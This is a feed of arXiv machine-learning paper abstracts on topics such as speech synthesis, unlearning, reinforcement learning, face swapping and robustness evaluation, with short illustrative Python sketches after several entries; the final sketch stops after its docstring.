    Adversarial Training of Denoising Diffusion Model Using Dual Discriminators for High-Fidelity Multi-Speaker TTS. (arXiv:2308.01573v1 [cs.SD])
    The diffusion model is capable of generating high-quality data through a probabilistic approach. However, it suffers from the drawback of slow generation speed due to the requirement of a large number of time steps. To address this limitation, recent models such as denoising diffusion implicit models (DDIM) focus on generating samples without directly modeling the probability distribution, while models like denoising diffusion generative adversarial networks (GAN) combine diffusion processes with GANs. In the field of speech synthesis, a recent diffusion speech synthesis model called DiffGAN-TTS, utilizing the structure of GANs, has been introduced and demonstrates superior performance in both speech quality and generation speed. In this paper, to further enhance the performance of DiffGAN-TTS, we propose a speech synthesis model with two discriminators: a diffusion discriminator for learning the distribution of the reverse process and a spectrogram discriminator for learning the distribution of the generated data. Objective metrics such as structural similarity index measure (SSIM), mel-cepstral distortion (MCD), F0 root mean squared error (F0 RMSE), short-time objective intelligibility (STOI), perceptual evaluation of speech quality (PESQ), as well as subjective metrics like mean opinion score (MOS), are used to evaluate the performance of the proposed model. The evaluation results show that the proposed model outperforms recent state-of-the-art models such as FastSpeech2 and DiffGAN-TTS in various metrics. Our implementation and audio samples are located on GitHub.
    Model Sparsity Can Simplify Machine Unlearning. (arXiv:2304.04934v7 [cs.LG] UPDATED)
    In response to recent data regulation requirements, machine unlearning (MU) has emerged as a critical process to remove the influence of specific examples from a given model. Although exact unlearning can be achieved through complete model retraining using the remaining dataset, the associated computational costs have driven the development of efficient, approximate unlearning techniques. Moving beyond data-centric MU approaches, our study introduces a novel model-based perspective: model sparsification via weight pruning, which is capable of reducing the gap between exact unlearning and approximate unlearning. We show in both theory and practice that model sparsity can boost the multi-criteria unlearning performance of an approximate unlearner, closing the approximation gap, while continuing to be efficient. This leads to a new MU paradigm, termed prune first, then unlearn, which infuses a sparse model prior into the unlearning process. Building on this insight, we also develop a sparsity-aware unlearning method that utilizes sparsity regularization to enhance the training process of approximate unlearning. Extensive experiments show that our proposals consistently benefit MU in various unlearning scenarios. A notable highlight is the 77% unlearning efficacy gain of fine-tuning (one of the simplest unlearning methods) when using sparsity-aware unlearning. Furthermore, we demonstrate the practical impact of our proposed MU methods in addressing other machine learning challenges, such as defending against backdoor attacks and enhancing transfer learning. Codes are available at https://github.com/OPTML-Group/Unlearn-Sparse.
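The "prune first" half of the paradigm can be illustrated with plain magnitude pruning. This sketch covers only the pruning step, with an arbitrary sparsity level and made-up weights; the paper pairs pruning with approximate unlearners such as fine-tuning on the retained data.

```python
def magnitude_prune(weights, sparsity):
    # Impose a sparse model prior by zeroing the smallest-magnitude
    # weights; an approximate unlearner is then run on the sparse model
    # ("prune first, then unlearn").
    k = int(len(weights) * sparsity)            # number of weights to zero
    order = sorted(range(len(weights)), key=lambda i: abs(weights[i]))
    drop = set(order[:k])                       # indices of smallest weights
    return [0.0 if i in drop else w for i, w in enumerate(weights)]

# Hypothetical flattened weight vector at 40% sparsity.
w = magnitude_prune([0.9, -0.05, 0.4, 0.01, -0.7], sparsity=0.4)
```

The intuition from the abstract is that the pruned (sparser) model leaves less capacity in which the influence of forgotten examples can hide, shrinking the gap to exact unlearning.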
    Job Shop Scheduling via Deep Reinforcement Learning: a Sequence to Sequence approach. (arXiv:2308.01797v1 [cs.AI])
    Job scheduling is a well-known Combinatorial Optimization problem with endless applications. Well planned schedules bring many benefits in the context of automated systems: among others, they limit production costs and waste. Nevertheless, the NP-hardness of this problem makes it essential to use heuristics whose design is difficult, requires specialized knowledge and often produces methods tailored to the specific task. This paper presents an original end-to-end Deep Reinforcement Learning approach to scheduling that automatically learns dispatching rules. Our technique is inspired by natural language encoder-decoder models for sequence processing and has never been used, to the best of our knowledge, for scheduling purposes. We applied and tested our method in particular to some benchmark instances of Job Shop Problem, but this technique is general enough to be potentially used to tackle other different optimal job scheduling tasks with minimal intervention. Results demonstrate that we outperform many classical approaches exploiting priority dispatching rules and show competitive results on state-of-the-art Deep Reinforcement Learning ones.
    Motion Planning Diffusion: Learning and Planning of Robot Motions with Diffusion Models. (arXiv:2308.01557v1 [cs.RO])
Learning priors on trajectory distributions can help accelerate robot motion planning optimization. Given previously successful plans, learning trajectory generative models as priors for a new planning problem is highly desirable. Prior works propose several ways of utilizing this prior to bootstrap the motion planning problem: either sampling the prior for initializations or using the prior distribution in a maximum-a-posteriori formulation for trajectory optimization. In this work, we propose learning diffusion models as priors. We can then sample directly from the posterior trajectory distribution conditioned on task goals, by leveraging the inverse denoising process of diffusion models. Furthermore, diffusion has recently been shown to effectively encode data multimodality in high-dimensional settings, which makes it particularly well-suited for large trajectory datasets. To demonstrate our method's efficacy, we compare our proposed method - Motion Planning Diffusion - against several baselines in simulated planar robot and 7-dof robot arm manipulator environments. To assess the generalization capabilities of our method, we test it in environments with previously unseen obstacles. Our experiments show that diffusion models are strong priors for encoding high-dimensional trajectory distributions of robot motions.
    Distribution-Free Inference for the Regression Function of Binary Classification. (arXiv:2308.01835v1 [stat.ML])
    One of the key objects of binary classification is the regression function, i.e., the conditional expectation of the class labels given the inputs. With the regression function not only a Bayes optimal classifier can be defined, but it also encodes the corresponding misclassification probabilities. The paper presents a resampling framework to construct exact, distribution-free and non-asymptotically guaranteed confidence regions for the true regression function for any user-chosen confidence level. Then, specific algorithms are suggested to demonstrate the framework. It is proved that the constructed confidence regions are strongly consistent, that is, any false model is excluded in the long run with probability one. The exclusion is quantified with probably approximately correct type bounds, as well. Finally, the algorithms are validated via numerical experiments, and the methods are compared to approximate asymptotic confidence ellipsoids.
    Minimax Optimal $Q$ Learning with Nearest Neighbors. (arXiv:2308.01490v1 [cs.LG])
$Q$ learning is a popular model-free reinforcement learning method. Most existing works focus on analyzing $Q$ learning for finite state and action spaces. If the state space is continuous, then the original $Q$ learning method cannot be directly used. A modification of the original $Q$ learning method was proposed in (Shah and Xie, 2018), which estimates $Q$ values with nearest neighbors. This modification makes $Q$ learning suitable for continuous state spaces. (Shah and Xie, 2018) shows that the convergence rate of the estimated $Q$ function is $\tilde{O}(T^{-1/(d+3)})$, which is slower than the minimax lower bound $\tilde{\Omega}(T^{-1/(d+2)})$, indicating that this method is not efficient. This paper proposes two new $Q$ learning methods to bridge the gap in convergence rates left by (Shah and Xie, 2018), one of them offline and the other online. Although we still use a nearest neighbor approach to estimate the $Q$ function, the algorithms are crucially different from (Shah and Xie, 2018). In particular, we replace the kernel nearest neighbor over a discretized region with a direct nearest neighbor approach. Consequently, our approach significantly improves the convergence rate. Moreover, the time complexity is also significantly improved in high-dimensional state spaces. Our analysis shows that both the offline and online methods are minimax rate optimal.
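The "direct nearest neighbor" idea can be sketched as averaging stored targets of the closest states for a given action. This is a schematic fragment under assumed one-dimensional states and a made-up replay memory, not the paper's full offline or online algorithm.

```python
def knn_q_value(memory, state, action, k=3):
    # Direct nearest-neighbor Q estimate over a continuous state space:
    # average the stored targets of the k closest states for this action.
    entries = [(abs(s - state), q) for (s, a, q) in memory if a == action]
    entries.sort(key=lambda t: t[0])            # closest states first
    nearest = entries[:k]
    return sum(q for _, q in nearest) / len(nearest)

# Hypothetical memory of (state, action, target) triples.
memory = [(0.0, 0, 1.0), (0.1, 0, 1.2), (0.9, 0, 3.0), (0.5, 1, 2.0)]
q = knn_q_value(memory, state=0.05, action=0, k=2)
```

Replacing a kernel average over a discretized region with this direct neighbor lookup is, per the abstract, what closes the gap to the minimax-optimal rate.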
    MFIM: Megapixel Facial Identity Manipulation. (arXiv:2308.01536v1 [cs.CV])
    Face swapping is a task that changes a facial identity of a given image to that of another person. In this work, we propose a novel face-swapping framework called Megapixel Facial Identity Manipulation (MFIM). The face-swapping model should achieve two goals. First, it should be able to generate a high-quality image. We argue that a model which is proficient in generating a megapixel image can achieve this goal. However, generating a megapixel image is generally difficult without careful model design. Therefore, our model exploits pretrained StyleGAN in the manner of GAN-inversion to effectively generate a megapixel image. Second, it should be able to effectively transform the identity of a given image. Specifically, it should be able to actively transform ID attributes (e.g., face shape and eyes) of a given image into those of another person, while preserving ID-irrelevant attributes (e.g., pose and expression). To achieve this goal, we exploit 3DMM that can capture various facial attributes. Specifically, we explicitly supervise our model to generate a face-swapped image with the desirable attributes using 3DMM. We show that our model achieves state-of-the-art performance through extensive experiments. Furthermore, we propose a new operation called ID mixing, which creates a new identity by semantically mixing the identities of several people. It allows the user to customize the new identity.
    Regularization, early-stopping and dreaming: a Hopfield-like setup to address generalization and overfitting. (arXiv:2308.01421v1 [cs.LG])
    In this work we approach attractor neural networks from a machine learning perspective: we look for optimal network parameters by applying a gradient descent over a regularized loss function. Within this framework, the optimal neuron-interaction matrices turn out to be a class of matrices which correspond to Hebbian kernels revised by iteratively applying some unlearning protocols. Remarkably, the number of unlearning steps is proved to be related to the regularization hyperparameters of the loss function and to the training time. Thus, we can design strategies to avoid overfitting that are formulated in terms of the algebraic properties of the interaction matrix, or, equivalently, in terms of regularization tuning and early-stopping strategies. The generalization capabilities of these attractor networks are also investigated: analytical results are obtained for random synthetic datasets, next, the emerging picture is corroborated by numerical experiments that highlight the existence of several regimes (i.e., overfitting, failure and success) as the dataset parameters are varied.
    OpenAGI: When LLM Meets Domain Experts. (arXiv:2304.04370v5 [cs.AI] UPDATED)
    Human intelligence excels at combining basic skills to solve complex tasks. This capability is vital for Artificial Intelligence (AI) and should be embedded in comprehensive intelligent models, enabling them to harness expert models for complex task-solving towards Artificial General Intelligence (AGI). Large Language Models (LLMs) show promising learning and reasoning abilities, and can effectively use external models, tools or APIs to tackle complex problems. In this work, we introduce OpenAGI, an open-source AGI research platform designed for multi-step, real-world tasks. Specifically, OpenAGI uses a dual strategy, integrating standard benchmark tasks for benchmarking and evaluation, and open-ended tasks including more expandable models, tools or APIs for creative problem-solving. Tasks are presented as natural language queries to the LLM, which then selects and executes appropriate models. We also propose a Reinforcement Learning from Task Feedback (RLTF) mechanism that uses task results to improve the LLM's ability, which creates a self-improving AI feedback loop. While we acknowledge that AGI is a broad and multifaceted research challenge with no singularly defined solution path, the integration of LLMs with domain-specific expert models, inspired by mirroring the blend of general and specialized intelligence in humans, offers a promising approach towards AGI. We are open-sourcing the OpenAGI project's code, dataset, benchmarks, evaluation methods, and demo to foster community involvement in AGI advancement: https://github.com/agiresearch/OpenAGI.  ( 3 min )
    Computational Long Exposure Mobile Photography. (arXiv:2308.01379v1 [cs.CV])
    Long exposure photography produces stunning imagery, representing moving elements in a scene with motion-blur. It is generally employed in two modalities, producing either a foreground or a background blur effect. Foreground blur images are traditionally captured on a tripod-mounted camera and portray blurred moving foreground elements, such as silky water or light trails, over a perfectly sharp background landscape. Background blur images, also called panning photography, are captured while the camera is tracking a moving subject, to produce an image of a sharp subject over a background blurred by relative motion. Both techniques are notoriously challenging and require additional equipment and advanced skills. In this paper, we describe a computational burst photography system that operates in a hand-held smartphone camera app, and achieves these effects fully automatically, at the tap of the shutter button. Our approach first detects and segments the salient subject. We track the scene motion over multiple frames and align the images in order to preserve desired sharpness and to produce aesthetically pleasing motion streaks. We capture an under-exposed burst and select the subset of input frames that will produce blur trails of controlled length, regardless of scene or camera motion velocity. We predict inter-frame motion and synthesize motion-blur to fill the temporal gaps between the input frames. Finally, we composite the blurred image with the sharp regular exposure to protect the sharpness of faces or areas of the scene that are barely moving, and produce a final high resolution and high dynamic range (HDR) photograph. Our system democratizes a capability previously reserved to professionals, and makes this creative style accessible to most casual photographers. More information and supplementary material can be found on our project webpage: https://motion-mode.github.io/  ( 3 min )
    Computer Vision Estimation of Emotion Reaction Intensity in the Wild. (arXiv:2303.10741v2 [cs.CV] UPDATED)
    Emotions play an essential role in human communication. Developing computer vision models for automatic recognition of emotion expression can aid in a variety of domains, including robotics, digital behavioral healthcare, and media analytics. There are three types of emotional representations which are traditionally modeled in affective computing research: Action Units, Valence Arousal (VA), and Categorical Emotions. As part of an effort to move beyond these representations towards more fine-grained labels, we describe our submission to the newly introduced Emotional Reaction Intensity (ERI) Estimation challenge in the 5th competition for Affective Behavior Analysis in-the-Wild (ABAW). We developed four deep neural networks trained in the visual domain and a multimodal model trained with both visual and audio features to predict emotion reaction intensity. Our best performing model on the Hume-Reaction dataset achieved an average Pearson correlation coefficient of 0.4080 on the test set using a pre-trained ResNet50 model. This work provides a first step towards the development of production-grade models which predict emotion reaction intensities rather than discrete emotion categories.  ( 2 min )
    Quantification of Predictive Uncertainty via Inference-Time Sampling. (arXiv:2308.01731v1 [cs.LG])
    Predictive variability due to data ambiguities has typically been addressed via construction of dedicated models with built-in probabilistic capabilities that are trained to predict uncertainty estimates as variables of interest. These approaches require distinct architectural components and training mechanisms, may include restrictive assumptions and exhibit overconfidence, i.e., high confidence in imprecise predictions. In this work, we propose a post-hoc sampling strategy for estimating predictive uncertainty accounting for data ambiguity. The method can generate different plausible outputs for a given input and does not assume parametric forms of predictive distributions. It is architecture agnostic and can be applied to any feed-forward deterministic network without changes to the architecture or training procedure. Experiments on regression tasks on imaging and non-imaging input data show the method's ability to generate diverse and multi-modal predictive distributions, and a desirable correlation of the estimated uncertainty with the prediction error.  ( 2 min )
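One simple instance of such inference-time sampling is to push noise-perturbed copies of the input through an unchanged deterministic model and read off the spread of the outputs. The perturbation scheme and stand-in model below are assumptions for illustration, not necessarily the paper's strategy.

```python
import random
import statistics

def predictive_samples(model, x, n=200, noise=0.05, seed=0):
    # Post-hoc, architecture-agnostic sampling: the model and its training
    # are untouched; uncertainty comes from the spread of outputs under
    # input perturbations at inference time.
    rng = random.Random(seed)
    return [model(x + rng.gauss(0.0, noise)) for _ in range(n)]

model = lambda x: x ** 2                  # stand-in deterministic network
ys = predictive_samples(model, 1.0)
mean = statistics.mean(ys)                # point prediction
spread = statistics.stdev(ys)             # uncertainty estimate
```

Because the procedure only wraps the forward pass, it applies to any feed-forward deterministic network, which is the architecture-agnostic property the abstract emphasizes.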
    Curricular Transfer Learning for Sentence Encoded Tasks. (arXiv:2308.01849v1 [cs.CL])
    Fine-tuning language models in a downstream task is the standard approach for many state-of-the-art methodologies in the field of NLP. However, when the distribution between the source task and target task drifts, \textit{e.g.}, conversational environments, these gains tend to be diminished. This article proposes a sequence of pre-training steps (a curriculum) guided by "data hacking" and grammar analysis that allows further gradual adaptation between pre-training distributions. In our experiments, we acquire a considerable improvement from our method compared to other known pre-training approaches for the MultiWoZ task.  ( 2 min )
    An Introduction to Bi-level Optimization: Foundations and Applications in Signal Processing and Machine Learning. (arXiv:2308.00788v2 [cs.LG] UPDATED)
    Recently, bi-level optimization (BLO) has taken center stage in some very exciting developments in the area of signal processing (SP) and machine learning (ML). Roughly speaking, BLO is a classical optimization problem that involves two levels of hierarchy (i.e., upper and lower levels), wherein obtaining the solution to the upper-level problem requires solving the lower-level one. BLO has become popular largely because it is powerful in modeling problems in SP and ML, among others, that involve optimizing nested objective functions. Prominent applications of BLO range from resource allocation for wireless systems to adversarial machine learning. In this work, we focus on a class of tractable BLO problems that often appear in SP and ML applications. We provide an overview of some basic concepts of this class of BLO problems, such as their optimality conditions, standard algorithms (including their optimization principles and practical implementations), as well as how they can be leveraged to obtain state-of-the-art results for a number of key SP and ML applications. Further, we discuss some recent advances in BLO theory, its implications for applications, and point out some limitations of the state-of-the-art that require significant future research efforts. Overall, we hope that this article can serve to accelerate the adoption of BLO as a generic tool to model, analyze, and innovate on a wide array of emerging SP and ML applications.  ( 3 min )
    A Missing Value Filling Model Based on Feature Fusion Enhanced Autoencoder. (arXiv:2208.13495v2 [cs.LG] UPDATED)
With the advent of the big data era, the data quality problem is becoming more critical. Among many factors, data with missing values is one primary issue, and thus developing effective imputation models is a key topic in the research community. Recently, a major research direction is to employ neural network models such as self-organizing maps or autoencoders for filling missing values. However, these classical methods can hardly discover interrelated features and common features simultaneously among data attributes. In particular, it is a very typical problem for classical autoencoders that they often learn invalid constant mappings, which dramatically hurts the filling performance. To solve the above-mentioned problems, we propose a missing-value-filling model based on a feature-fusion-enhanced autoencoder. We first incorporate into an autoencoder a hidden layer that consists of de-tracking neurons and radial basis function neurons, which can enhance the ability of learning interrelated features and common features. Besides, we develop a missing value filling strategy based on dynamic clustering that is incorporated into an iterative optimization process. This design can enhance the multi-dimensional feature fusion ability and thus improves the dynamic collaborative missing-value-filling performance. The effectiveness of the proposed model is validated by extensive experiments compared to a variety of baseline methods on thirteen data sets.  ( 2 min )
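Most iterative imputers, including autoencoder-based ones, start from a simple statistical fill before a model refines the estimates. The sketch below shows only that column-mean initialization step; the paper's feature-fusion autoencoder and dynamic clustering, which do the actual refinement, are omitted.

```python
def mean_impute(rows, missing=None):
    # Column-mean initialization of missing entries: the common starting
    # point that an iterative model-based imputer then refines.
    cols = list(zip(*rows))
    means = []
    for col in cols:
        obs = [v for v in col if v is not missing]
        means.append(sum(obs) / len(obs))       # mean of observed values only
    return [[means[j] if v is missing else v for j, v in enumerate(row)]
            for row in rows]

# Tiny 3x2 table with two missing entries (None).
filled = mean_impute([[1.0, None], [3.0, 4.0], [None, 6.0]])
```

A constant fill like this is exactly the kind of "invalid constant mapping" the abstract warns a plain autoencoder can collapse to, which motivates the de-tracking neurons.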
    Hebbian Deep Learning Without Feedback. (arXiv:2209.11883v2 [cs.NE] UPDATED)
    Recent approximations to backpropagation (BP) have mitigated many of BP's computational inefficiencies and incompatibilities with biology, but important limitations still remain. Moreover, the approximations significantly decrease accuracy in benchmarks, suggesting that an entirely different approach may be more fruitful. Here, grounded on recent theory for Hebbian learning in soft winner-take-all networks, we present multilayer SoftHebb, i.e. an algorithm that trains deep neural networks, without any feedback, target, or error signals. As a result, it achieves efficiency by avoiding weight transport, non-local plasticity, time-locking of layer updates, iterative equilibria, and (self-) supervisory or other feedback signals -- which were necessary in other approaches. Its increased efficiency and biological compatibility do not trade off accuracy compared to state-of-the-art bio-plausible learning, but rather improve it. With up to five hidden layers and an added linear classifier, accuracies on MNIST, CIFAR-10, STL-10, and ImageNet, respectively reach 99.4%, 80.3%, 76.2%, and 27.3%. In conclusion, SoftHebb shows with a radically different approach from BP that Deep Learning over few layers may be plausible in the brain and increases the accuracy of bio-plausible machine learning. Code is available at https://github.com/NeuromorphicComputing/SoftHebb.  ( 2 min )
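The feedback-free character of this family of methods can be illustrated with a generic soft winner-take-all competitive rule: each unit's update uses only its own input and activation, with no error, target, or backpropagated signal. Note this is a distance-based soft competitive sketch in the same spirit, not the actual SoftHebb update (which uses dot-product similarity with weight normalization); every parameter here is illustrative:

```python
import numpy as np

def soft_wta_hebbian(X, n_units=3, lr=0.05, temp=0.5, n_epochs=20):
    """Soft winner-take-all competitive learning: a local,
    feedback-free update in the spirit of (but not identical to)
    SoftHebb. Units drift toward the inputs they win."""
    W = np.array(X[:n_units], dtype=float)     # seed units on data points
    for _ in range(n_epochs):
        for x in X:
            d2 = ((W - x) ** 2).sum(axis=1)    # squared distances
            logits = -d2 / temp
            y = np.exp(logits - logits.max())
            y /= y.sum()                       # soft winner-take-all
            # local update: no error or feedback signal is involved
            W += lr * y[:, None] * (x - W)
    return W
```

On well-separated clusters the units converge near the cluster centers, showing that purely local competition can discover structure without any supervisory signal.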
    Efficient neural supersampling on a novel gaming dataset. (arXiv:2308.01483v1 [cs.CV])
    Real-time rendering for video games has become increasingly challenging due to the need for higher resolutions, framerates and photorealism. Supersampling has emerged as an effective solution to address this challenge. Our work introduces a novel neural algorithm for supersampling rendered content that is 4 times more efficient than existing methods while maintaining the same level of accuracy. Additionally, we introduce a new dataset which provides auxiliary modalities such as motion vectors and depth generated using graphics rendering features like viewport jittering and mipmap biasing at different resolutions. We believe that this dataset fills a gap in the current dataset landscape and can serve as a valuable resource to help measure progress in the field and advance the state-of-the-art in super-resolution techniques for gaming content.  ( 2 min )
    Automatically Bounding the Taylor Remainder Series: Tighter Bounds and New Applications. (arXiv:2212.11429v3 [cs.LG] UPDATED)
    We present a new algorithm for automatically bounding the Taylor remainder series. In the special case of a scalar function $f: \mathbb{R} \to \mathbb{R}$, our algorithm takes as input a reference point $x_0$, trust region $[a, b]$, and integer $k \ge 1$, and returns an interval $I$ such that $f(x) - \sum_{i=0}^{k-1} \frac {1} {i!} f^{(i)}(x_0) (x - x_0)^i \in I (x - x_0)^k$ for all $x \in [a, b]$. As in automatic differentiation, the function $f$ is provided to the algorithm in symbolic form, and must be composed of known atomic functions. At a high level, our algorithm has two steps. First, for a variety of commonly-used elementary functions (e.g., $\exp$, $\log$), we use recently-developed theory to derive sharp polynomial upper and lower bounds on the Taylor remainder series. We then recursively combine the bounds for the elementary functions using an interval arithmetic variant of Taylor-mode automatic differentiation. Our algorithm can make efficient use of machine learning hardware accelerators, and we provide an open source implementation in JAX. We then turn our attention to applications. Most notably, in a companion paper we use our new machinery to create the first universal majorization-minimization optimization algorithms: algorithms that iteratively minimize an arbitrary loss using a majorizer that is derived automatically, rather than by hand. We also show that our automatically-derived bounds can be used for verified global optimization and numerical integration, and to prove sharper versions of Jensen's inequality.  ( 3 min )
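The contract the algorithm satisfies is easy to state and check for a single elementary function. For f = exp with x0 in [a, b], the Lagrange form of the remainder gives a valid (though not necessarily sharp) interval I = [e^a/k!, e^b/k!], since exp is its own k-th derivative. A hand-derived sketch of that one case, not the paper's recursive interval-arithmetic machinery:

```python
import math

def exp_taylor_remainder_interval(x0, a, b, k):
    """Interval I with exp(x) - P_{k-1}(x) in I*(x - x0)^k for all x in
    [a, b], via the Lagrange remainder (exp is its own k-th derivative).
    A single-function bound, not the paper's full algorithm."""
    assert a <= x0 <= b and k >= 1
    return (math.exp(a) / math.factorial(k), math.exp(b) / math.factorial(k))

def taylor_poly_exp(x, x0, k):
    """Degree k-1 Taylor polynomial of exp around x0."""
    return sum(math.exp(x0) * (x - x0) ** i / math.factorial(i)
               for i in range(k))
```

Checking the membership f(x) - P_{k-1}(x) ∈ I (x - x0)^k on a grid verifies the bound; the paper's contribution is deriving sharp such intervals automatically for arbitrary compositions.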
    Assessing Systematic Weaknesses of DNNs using Counterfactuals. (arXiv:2308.01614v1 [cs.LG])
    With the advancement of DNNs into safety-critical applications, testing approaches for such models have gained more attention. A current direction is the search for and identification of systematic weaknesses that put safety assumptions based on average performance values at risk. Such weaknesses can take on the form of (semantically coherent) subsets or areas in the input space where a DNN performs systematically worse than its expected average. However, it is non-trivial to attribute the reason for such observed low performances to the specific semantic features that describe the subset. For instance, inhomogeneities within the data w.r.t. other (non-considered) attributes might distort results. However, taking into account all (available) attributes and their interaction is often computationally highly expensive. Inspired by counterfactual explanations, we propose an effective and computationally cheap algorithm to validate the semantic attribution of existing subsets, i.e., to check whether the identified attribute is likely to have caused the degraded performance. We demonstrate this approach on an example from the autonomous driving domain using highly annotated simulated data, where we show for a semantic segmentation model that (i) performance differences among the different pedestrian assets exist, but (ii) only in some cases is the asset type itself the reason for this reduction in the performance.  ( 2 min )
    ChatMOF: An Autonomous AI System for Predicting and Generating Metal-Organic Frameworks. (arXiv:2308.01423v1 [cs.CL])
ChatMOF is an autonomous artificial intelligence (AI) system built to predict and generate metal-organic frameworks (MOFs). By leveraging a large-scale language model (gpt-3.5-turbo), ChatMOF extracts key details from textual inputs and delivers appropriate responses, eliminating the need for rigid structured queries. The system comprises three core components (an agent, a toolkit, and an evaluator) that form a robust pipeline managing a variety of tasks, including data retrieval, property prediction, and structure generation. The study further explores the merits and constraints of using large language model (LLM)-based AI systems in materials science and showcases their transformative potential for future advancements.  ( 2 min )
    Learning to Model the World with Language. (arXiv:2308.01399v1 [cs.CL])
    To interact with humans in the world, agents need to understand the diverse types of language that people use, relate them to the visual world, and act based on them. While current agents learn to execute simple language instructions from task rewards, we aim to build agents that leverage diverse language that conveys general knowledge, describes the state of the world, provides interactive feedback, and more. Our key idea is that language helps agents predict the future: what will be observed, how the world will behave, and which situations will be rewarded. This perspective unifies language understanding with future prediction as a powerful self-supervised learning objective. We present Dynalang, an agent that learns a multimodal world model that predicts future text and image representations and learns to act from imagined model rollouts. Unlike traditional agents that use language only to predict actions, Dynalang acquires rich language understanding by using past language also to predict future language, video, and rewards. In addition to learning from online interaction in an environment, Dynalang can be pretrained on datasets of text, video, or both without actions or rewards. From using language hints in grid worlds to navigating photorealistic scans of homes, Dynalang utilizes diverse types of language to improve task performance, including environment descriptions, game rules, and instructions.  ( 2 min )
    DualCoOp++: Fast and Effective Adaptation to Multi-Label Recognition with Limited Annotations. (arXiv:2308.01890v1 [cs.CV])
    Multi-label image recognition in the low-label regime is a task of great challenge and practical significance. Previous works have focused on learning the alignment between textual and visual spaces to compensate for limited image labels, yet may suffer from reduced accuracy due to the scarcity of high-quality multi-label annotations. In this research, we leverage the powerful alignment between textual and visual features pretrained with millions of auxiliary image-text pairs. We introduce an efficient and effective framework called Evidence-guided Dual Context Optimization (DualCoOp++), which serves as a unified approach for addressing partial-label and zero-shot multi-label recognition. In DualCoOp++ we separately encode evidential, positive, and negative contexts for target classes as parametric components of the linguistic input (i.e., prompts). The evidential context aims to discover all the related visual content for the target class, and serves as guidance to aggregate positive and negative contexts from the spatial domain of the image, enabling better distinguishment between similar categories. Additionally, we introduce a Winner-Take-All module that promotes inter-class interaction during training, while avoiding the need for extra parameters and costs. As DualCoOp++ imposes minimal additional learnable overhead on the pretrained vision-language framework, it enables rapid adaptation to multi-label recognition tasks with limited annotations and even unseen classes. Experiments on standard multi-label recognition benchmarks across two challenging low-label settings demonstrate the superior performance of our approach compared to state-of-the-art methods.  ( 3 min )
    Follow the Soldiers with Optimized Single-Shot Multibox Detection and Reinforcement Learning. (arXiv:2308.01389v1 [cs.RO])
Nowadays, autonomous cars are gaining traction due to their numerous potential applications on battlefields and in resolving a variety of other real-world challenges. The main goal of our project is to build an autonomous system using DeepRacer that follows a specific person (in our project, a soldier) as they move in any direction. The two main components used to accomplish this are an optimized Single-Shot Multibox Detection (SSD) object detection model and a Reinforcement Learning (RL) model. We accomplished the task using SSD Lite instead of SSD and, at the end, compared the results among SSD, SSD with a Neural Compute Stick (NCS), and SSD Lite. Experimental results show that SSD Lite performs best among these three techniques and exhibits a considerable boost in inference speed (~2-3 times) without compromising accuracy.  ( 2 min )
    Improving Replay Sample Selection and Storage for Less Forgetting in Continual Learning. (arXiv:2308.01895v1 [cs.LG])
Continual learning seeks to enable deep learners to train on a series of tasks of unknown length without suffering from catastrophic forgetting of previous tasks. One effective solution is replay, which involves storing a few previous experiences in memory and replaying them when learning the current task. However, there is still room for improvement in selecting the most informative samples for storage and in determining the optimal number of samples to be stored. This study addresses these issues with a novel comparison of the commonly used reservoir sampling to various alternative population strategies, and provides a detailed analysis of how to find the optimal number of stored samples.  ( 2 min )
    Domain knowledge-informed Synthetic fault sample generation with Health Data Map for cross-domain Planetary Gearbox Fault Diagnosis. (arXiv:2305.19569v4 [cs.LG] UPDATED)
    Extensive research has been conducted on fault diagnosis of planetary gearboxes using vibration signals and deep learning (DL) approaches. However, DL-based methods are susceptible to the domain shift problem caused by varying operating conditions of the gearbox. Although domain adaptation and data synthesis methods have been proposed to overcome such domain shifts, they are often not directly applicable in real-world situations where only healthy data is available in the target domain. To tackle the challenge of extreme domain shift scenarios where only healthy data is available in the target domain, this paper proposes two novel domain knowledge-informed data synthesis methods utilizing the health data map (HDMap). The two proposed approaches are referred to as scaled CutPaste and FaultPaste. The HDMap is used to physically represent the vibration signal of the planetary gearbox as an image-like matrix, allowing for visualization of fault-related features. CutPaste and FaultPaste are then applied to generate faulty samples based on the healthy data in the target domain, using domain knowledge and fault signatures extracted from the source domain, respectively. In addition to generating realistic faults, the proposed methods introduce scaling of fault signatures for controlled synthesis of faults with various severity levels. A case study is conducted on a planetary gearbox testbed to evaluate the proposed approaches. The results show that the proposed methods are capable of accurately diagnosing faults, even in cases of extreme domain shift, and can estimate the severity of faults that have not been previously observed in the target domain.  ( 3 min )
    Interpretable Machine Learning for Discovery: Statistical Challenges \& Opportunities. (arXiv:2308.01475v1 [stat.ML])
New technologies have led to vast troves of large and complex datasets across many scientific domains and industries. People routinely use machine learning techniques to not only process, visualize, and make predictions from this big data, but also to make data-driven discoveries. These discoveries are often made using Interpretable Machine Learning, or machine learning models and techniques that yield human understandable insights. In this paper, we discuss and review the field of interpretable machine learning, focusing especially on the techniques as they are often employed to generate new knowledge or make discoveries from large data sets. We outline the types of discoveries that can be made using Interpretable Machine Learning in both supervised and unsupervised settings. Additionally, we focus on the grand challenge of how to validate these discoveries in a data-driven manner, which promotes trust in machine learning systems and reproducibility in science. We discuss validation from both a practical perspective, reviewing approaches based on data-splitting and stability, as well as from a theoretical perspective, reviewing statistical results on model selection consistency and uncertainty quantification via statistical inference. Finally, we conclude by highlighting open challenges in using interpretable machine learning techniques to make discoveries, including gaps between theory and practice for validating data-driven discoveries.  ( 2 min )
    URET: Universal Robustness Evaluation Toolkit (for Evasion). (arXiv:2308.01840v1 [cs.LG])
    Machine learning models are known to be vulnerable to adversarial evasion attacks as illustrated by image classification models. Thoroughly understanding such attacks is critical in order to ensure the safety and robustness of critical AI tasks. However, most evasion attacks are difficult to deploy against a majority of AI systems because they have focused on image domain with only few constraints. An image is composed of homogeneous, numerical, continuous, and independent features, unlike many other input types to AI systems used in practice. Furthermore, some input types include additional semantic and functional constraints that must be observed to generate realistic adversarial inputs. In this work, we propose a new framework to enable the generation of adversarial inputs irrespective of the input type and task domain. Given an input and a set of pre-defined input transformations, our framework discovers a sequence of transformations that result in a semantically correct and functional adversarial input. We demonstrate the generality of our approach on several diverse machine learning tasks with various input representations. We also show the importance of generating adversarial examples as they enable the deployment of mitigation techniques.  ( 2 min )
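The core loop the framework generalizes — searching over sequences of pre-defined input transformations until the model's decision flips while domain constraints hold — can be sketched generically. Below is a toy greedy search against a stand-in threshold "model"; the transformation set, validity constraint, and model are all illustrative, not the URET implementation:

```python
def greedy_evasion(x, predict, transforms, is_valid, max_depth=5):
    """Greedy search for a sequence of input transformations that
    changes the model's prediction while keeping the input valid.
    Generic sketch of the search idea, not the URET toolkit."""
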